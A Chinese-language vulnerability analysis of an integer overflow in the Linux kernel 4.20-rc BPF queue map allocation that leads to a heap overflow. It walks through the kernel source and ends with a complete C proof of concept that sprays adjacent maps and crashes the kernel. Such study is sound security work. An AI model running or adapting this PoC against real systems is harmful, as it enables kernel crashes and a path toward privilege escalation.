Linux kernel 4.20-rc1-rc4中存在一个整数溢出漏洞,导致堆溢出

BPF

根据man bpf中的描述

描述:

bpf系统调用执行一系列与extended Berkeley Packet Filters相关的操作,eBPF与传统的BPF相似,作用为 过滤网络包。对于eBPF和传统的BPF来说,为了确保它们进行的操作不会损伤运行时的系统,内核会在加 载程序之前静态地分析它们。

eBPF设计/架构:

++eBPF maps是一种通用的数据结构,它被用来存储不同的数据类型。数据类型通常被视为二进制块,所以++用户需要在创建maps的时候指定key和value的size,所以一个给定的键值对可以有任意的结构。一个用户进程可以创建多个maps,并可以通过文件描述符来访问它们。不同的eBPF程序可以平行地访问相同的maps。关于往maps中存什么完全是由用户进程和eBPF程序来决定的。

有一种特殊的map类型,被称为program array。这种map存储指向其他eBPF的文件描述符,当在该map中执行lookup的时候,程序流将被重定向到另一个eBPF程序的开头,而不会返回到正在调用的程序。嵌套的层数最大为32,所以无法实现无限循环。在运行时,在map中存储的文件描述符可以被修改,所以程序如果有什么特殊的需要的话是可以在功能上进行修改的。所有在program array中的程序都必须使用bpf系统调用提前加载到内核之中。如果map的lookup失败的话,程序会继续执行下去。

每一个eBPF程序都是一组指令,在完成之前都可以安全地执行。内核中的验证器会静态地确定程序终止或者安全地被执行。在验证的时候,内核会增加被验证的map的引用计数来确保被附加的map不能在程序卸载之前被移除。

整数溢出

调用bpf系统调用有以下两种方式:

1
2
3
4
#include <linux/bpf.h>
#include <unistd.h>
int bpf(int cmd, union bpf_attr *attr, unsigned int size);
syscall(__NR_bpf, cmd, attr, size);

其中,bpf函数似乎在bpf.h中并没有被声明,所以无法被调用,因此我使用的第二种方法

cmdBPF_MAP_CREATE0的时候,根据代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr __user *, uattr, unsigned int, size)
{
union bpf_attr attr = {};
int err;

if (sysctl_unprivileged_bpf_disabled && !capable(CAP_SYS_ADMIN))
return -EPERM;

err = bpf_check_uarg_tail_zero(uattr, sizeof(attr), size);
if (err)
return err;
size = min_t(u32, size, sizeof(attr));

/* copy attributes from user space, may be less than sizeof(bpf_attr) */
if (copy_from_user(&attr, uattr, size) != 0)
return -EFAULT;

err = security_bpf(cmd, &attr, size);
if (err < 0)
return err;

switch (cmd) {
case BPF_MAP_CREATE: <<-----------------------------------
err = map_create(&attr);
break;
......

得知,会调用map_create函数来创建一个map

跟进map_create函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
static int map_create(union bpf_attr *attr)
{
int numa_node = bpf_map_attr_numa_node(attr);
struct bpf_map *map;
int f_flags;
int err;

err = CHECK_ATTR(BPF_MAP_CREATE);
if (err)
return -EINVAL;

f_flags = bpf_get_file_flag(attr->map_flags);
if (f_flags < 0)
return f_flags;

if (numa_node != NUMA_NO_NODE &&
((unsigned int)numa_node >= nr_node_ids ||
!node_online(numa_node)))
return -EINVAL;

/* find map type and init map: hashtable vs rbtree vs bloom vs ... */
map = find_and_alloc_map(attr); <<----------------------------------
........

它是调用find_and_alloc_map来创建map

跟进find_and_alloc_map函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
static struct bpf_map *find_and_alloc_map(union bpf_attr *attr)
{
const struct bpf_map_ops *ops;
u32 type = attr->map_type;
struct bpf_map *map;
int err;

if (type >= ARRAY_SIZE(bpf_map_types))
return ERR_PTR(-EINVAL);
type = array_index_nospec(type, ARRAY_SIZE(bpf_map_types)); <<------------- 1
ops = bpf_map_types[type]; <<----------------- 2
if (!ops)
return ERR_PTR(-EINVAL);

if (ops->map_alloc_check) {
err = ops->map_alloc_check(attr);
if (err)
return ERR_PTR(err);
}
if (attr->map_ifindex)
ops = &bpf_map_offload_ops;
map = ops->map_alloc(attr); <<----------------- 3
if (IS_ERR(map))
return map;
map->ops = ops;
map->map_type = type;
return map;
}

它在1处根据map_type来查找一个type,然后从bpf_map_types中以typeindex来查找一个结构体,该结构体内存储着几个函数指针,其中在3处会调用map_alloc所指向的函数

如果我们的map_type传入BPF_MAP_TYPE_QUEUE的话,取出的ops会是

1
2
3
4
5
6
7
8
9
10
11
12
const struct bpf_map_ops queue_map_ops = {
.map_alloc_check = queue_stack_map_alloc_check,
.map_alloc = queue_stack_map_alloc,
.map_free = queue_stack_map_free,
.map_lookup_elem = queue_stack_map_lookup_elem,
.map_update_elem = queue_stack_map_update_elem,
.map_delete_elem = queue_stack_map_delete_elem,
.map_push_elem = queue_stack_map_push_elem,
.map_pop_elem = queue_map_pop_elem,
.map_peek_elem = queue_map_peek_elem,
.map_get_next_key = queue_stack_map_get_next_key,
};

因此在3处调用的就是queue_stack_map_alloc函数

跟进queue_stack_map_alloc函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
static struct bpf_map *queue_stack_map_alloc(union bpf_attr *attr)
{
int ret, numa_node = bpf_map_attr_numa_node(attr);
struct bpf_queue_stack *qs;
u32 size, value_size;
u64 queue_size, cost;

size = attr->max_entries + 1; <<--------------------- 1
value_size = attr->value_size;

queue_size = sizeof(*qs) + (u64) value_size * size;

cost = queue_size;
if (cost >= U32_MAX - PAGE_SIZE)
return ERR_PTR(-E2BIG);

cost = round_up(cost, PAGE_SIZE) >> PAGE_SHIFT;

ret = bpf_map_precharge_memlock(cost);
if (ret < 0)
return ERR_PTR(ret);

qs = bpf_map_area_alloc(queue_size, numa_node); <<------------------ 2
if (!qs)
return ERR_PTR(-ENOMEM);

memset(qs, 0, sizeof(*qs));

bpf_map_init_from_attr(&qs->map, attr);

qs->map.pages = cost;
qs->size = size;

raw_spin_lock_init(&qs->lock);

return &qs->map;
}

1处size = attr->max_entries + 1,这里attr->max_entries是一个u32,而它的值是用户传入的

那么如果用户传入一个0xffffffffsize就会是0

queue_size = sizeof(*qs) + (u64) value_size * size;得,queue_sizesizeof(*qs),并将它作为一个参数传入bpf_map_area_alloc函数

跟进bpf_map_area_alloc函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
void *bpf_map_area_alloc(size_t size, int numa_node)
{
/* We definitely need __GFP_NORETRY, so OOM killer doesn't
* trigger under memory pressure as we really just want to
* fail instead.
*/
const gfp_t flags = __GFP_NOWARN | __GFP_NORETRY | __GFP_ZERO;
void *area;

if (size <= (PAGE_SIZE << PAGE_ALLOC_COSTLY_ORDER)) {
area = kmalloc_node(size, GFP_USER | flags, numa_node);
if (area != NULL)
return area;
}

return __vmalloc_node_flags_caller(size, numa_node, GFP_KERNEL | flags,
__builtin_return_address(0));
}

可以看出来该函数是根据size为该map分配堆内存

这里其实就明白,上面的函数中发生了整数溢出,导致分配出来的堆比实际需要的堆要小

堆溢出

再回到第一个函数,如果cmdBPF_MAP_UPDATE_ELEM2的时候

1
2
3
4
5
6
7
8
9
10
11
......
switch (cmd) {
case BPF_MAP_CREATE:
err = map_create(&attr);
break;
case BPF_MAP_LOOKUP_ELEM:
err = map_lookup_elem(&attr);
break;
case BPF_MAP_UPDATE_ELEM:
err = map_update_elem(&attr);
......

就会调用map_update_elem函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
static int map_update_elem(union bpf_attr *attr)
{
void __user *ukey = u64_to_user_ptr(attr->key);
void __user *uvalue = u64_to_user_ptr(attr->value);
int ufd = attr->map_fd;
struct bpf_map *map;
void *key, *value;
u32 value_size;
struct fd f;
int err;

if (CHECK_ATTR(BPF_MAP_UPDATE_ELEM))
return -EINVAL;

f = fdget(ufd);
map = __bpf_map_get(f);
if (IS_ERR(map))
return PTR_ERR(map);

if (!(f.file->f_mode & FMODE_CAN_WRITE)) {
err = -EPERM;
goto err_put;
}

key = __bpf_copy_key(ukey, map->key_size);
if (IS_ERR(key)) {
err = PTR_ERR(key);
goto err_put;
}

if (map->map_type == BPF_MAP_TYPE_PERCPU_HASH ||
map->map_type == BPF_MAP_TYPE_LRU_PERCPU_HASH ||
map->map_type == BPF_MAP_TYPE_PERCPU_ARRAY ||
map->map_type == BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE)
value_size = round_up(map->value_size, 8) * num_possible_cpus();
else
value_size = map->value_size;

err = -ENOMEM;
value = kmalloc(value_size, GFP_USER | __GFP_NOWARN);
if (!value)
goto free_key;

err = -EFAULT;
if (copy_from_user(value, uvalue, value_size) != 0)
goto free_value;

/* Need to create a kthread, thus must support schedule */
if (bpf_map_is_dev_bound(map)) {
err = bpf_map_offload_update_elem(map, key, value, attr->flags);
goto out;
} else if (map->map_type == BPF_MAP_TYPE_CPUMAP ||
map->map_type == BPF_MAP_TYPE_SOCKHASH ||
map->map_type == BPF_MAP_TYPE_SOCKMAP) {
err = map->ops->map_update_elem(map, key, value, attr->flags);
goto out;
}

/* must increment bpf_prog_active to avoid kprobe+bpf triggering from
* inside bpf map update or delete otherwise deadlocks are possible
*/
preempt_disable();
__this_cpu_inc(bpf_prog_active);
if (map->map_type == BPF_MAP_TYPE_PERCPU_HASH ||
map->map_type == BPF_MAP_TYPE_LRU_PERCPU_HASH) {
err = bpf_percpu_hash_update(map, key, value, attr->flags);
} else if (map->map_type == BPF_MAP_TYPE_PERCPU_ARRAY) {
err = bpf_percpu_array_update(map, key, value, attr->flags);
} else if (map->map_type == BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE) {
err = bpf_percpu_cgroup_storage_update(map, key, value,
attr->flags);
} else if (IS_FD_ARRAY(map)) {
rcu_read_lock();
err = bpf_fd_array_map_update_elem(map, f.file, key, value,
attr->flags);
rcu_read_unlock();
} else if (map->map_type == BPF_MAP_TYPE_HASH_OF_MAPS) {
rcu_read_lock();
err = bpf_fd_htab_map_update_elem(map, f.file, key, value,
attr->flags);
rcu_read_unlock();
} else if (map->map_type == BPF_MAP_TYPE_REUSEPORT_SOCKARRAY) {
/* rcu_read_lock() is not needed */
err = bpf_fd_reuseport_array_update_elem(map, key, value,
attr->flags);
} else if (map->map_type == BPF_MAP_TYPE_QUEUE ||
map->map_type == BPF_MAP_TYPE_STACK) {
err = map->ops->map_push_elem(map, value, attr->flags); <<-------------
} else {
rcu_read_lock();
err = map->ops->map_update_elem(map, key, value, attr->flags);
rcu_read_unlock();
}
__this_cpu_dec(bpf_prog_active);
preempt_enable();
maybe_wait_bpf_programs(map);
out:
free_value:
kfree(value);
free_key:
kfree(key);
err_put:
fdput(f);
return err;
}

由于我们的map_typeBPF_MAP_TYPE_QUEUE,因此它会执行箭头所指的函数

还是根据这个结构体

1
2
3
4
5
6
7
8
9
10
11
12
const struct bpf_map_ops queue_map_ops = {
.map_alloc_check = queue_stack_map_alloc_check,
.map_alloc = queue_stack_map_alloc,
.map_free = queue_stack_map_free,
.map_lookup_elem = queue_stack_map_lookup_elem,
.map_update_elem = queue_stack_map_update_elem,
.map_delete_elem = queue_stack_map_delete_elem,
.map_push_elem = queue_stack_map_push_elem,
.map_pop_elem = queue_map_pop_elem,
.map_peek_elem = queue_map_peek_elem,
.map_get_next_key = queue_stack_map_get_next_key,
};

我们跟进queue_stack_map_push_elem

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
static int queue_stack_map_push_elem(struct bpf_map *map, void *value,
u64 flags)
{
struct bpf_queue_stack *qs = bpf_queue_stack(map);
unsigned long irq_flags;
int err = 0;
void *dst;

/* BPF_EXIST is used to force making room for a new element in case the
* map is full
*/
bool replace = (flags & BPF_EXIST);

/* Check supported flags for queue and stack maps */
if (flags & BPF_NOEXIST || flags > BPF_EXIST)
return -EINVAL;

raw_spin_lock_irqsave(&qs->lock, irq_flags);

if (queue_stack_map_is_full(qs)) {
if (!replace) { <<-------------------- 1
err = -E2BIG;
goto out;
}
/* advance tail pointer to overwrite oldest element */
if (unlikely(++qs->tail >= qs->size))
qs->tail = 0;
}

dst = &qs->elements[qs->head * qs->map.value_size];
memcpy(dst, value, qs->map.value_size); <<--------------------- 2

if (unlikely(++qs->head >= qs->size))
qs->head = 0;

out:
raw_spin_unlock_irqrestore(&qs->lock, irq_flags);
return err;
}
1
2
3
4
5
6
7
8
struct bpf_queue_stack {
struct bpf_map map;
raw_spinlock_t lock;
u32 head, tail;
u32 size; /* max_entries + 1 */

char elements[0] __aligned(8);
};

赫然看见2这里一处memcpy,根据qs结构体,便知道dst指向的本应该是(u64) value_size * size这么大的空间,然而我们却让它变成了0

value是我们传入的指针,value_size是我们map_create的时候传入的,很明显这里就发生了堆溢出

要注意的是为了1处不通过,需要flags & BPF_EXIST为1

利用

要利用的话,看师傅们的文章中都有一个很骚的词,即堆风水,其实就是构造合适的环境来方便利用

根据内核堆分配的习惯,相同大小的堆一般会分到一块去,所以如果我们再申请几个相同大小的map的话,这些map紧邻的几率将会很大

以下是Poc,会导致内核报错

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <errno.h>
#include <pthread.h>
#include <sys/wait.h>
#include <linux/bpf.h>
#include <sys/mman.h>
#include <string.h>
#include <stdint.h>
#include <linux/bpf_common.h>
#ifndef __NR_BPF
#define __NR_BPF 321
#endif
#define ptr_to_u64(ptr) ((__u64)(unsigned long)(ptr))
void die(char *ptr)
{
perror(ptr);
exit(-1);
}

int bpf_create_map(enum bpf_map_type map_type,
unsigned int key_size,
unsigned int value_size,
unsigned int max_entries)
{
union bpf_attr attr = {
.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries};

return syscall(__NR_BPF, BPF_MAP_CREATE, &attr, sizeof(attr));
}

int bpf_update_elem(int fd, const void *key, const void *value,
uint64_t flags)
{
union bpf_attr attr = {
.map_fd = fd,
.key = ptr_to_u64(key),
.value = ptr_to_u64(value),
.flags = flags,
};

return syscall(__NR_BPF, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

int main()
{
void *addr = mmap((void *)0x2000000, 0x10000, 3, 0x32, -1, 0);
memset(addr, 0xff, 0x1000);
if (addr < 0)
{
die("mmap");
}
int fd = bpf_create_map(BPF_MAP_TYPE_QUEUE, 0, 0x100, 0xffffffff);
unsigned long victim[0x20] = {0};
for(int i=0;i<0x20;i++)
{
victim[i] = bpf_create_map(BPF_MAP_TYPE_QUEUE, 0, 0x100, 0xffffffff);
}
bpf_update_elem(fd, 0, (void*)0x2000000, BPF_EXIST);
for(int i=0;i<0x20;i++)
{
bpf_update_elem(victim[i], 0, (void*)0x2000000, BPF_EXIST);
}
}

总结

这个漏洞挺有意思的,也比较简单,适合作为CTF题出一出

参考

http://p4nda.top/2019/01/02/kernel-bpf-overflow/

https://www.anquanke.com/post/id/166819#h3-6

http://www.man7.org/linux/man-pages/man2/bpf.2.html

https://elixir.bootlin.com/linux/v4.20-rc1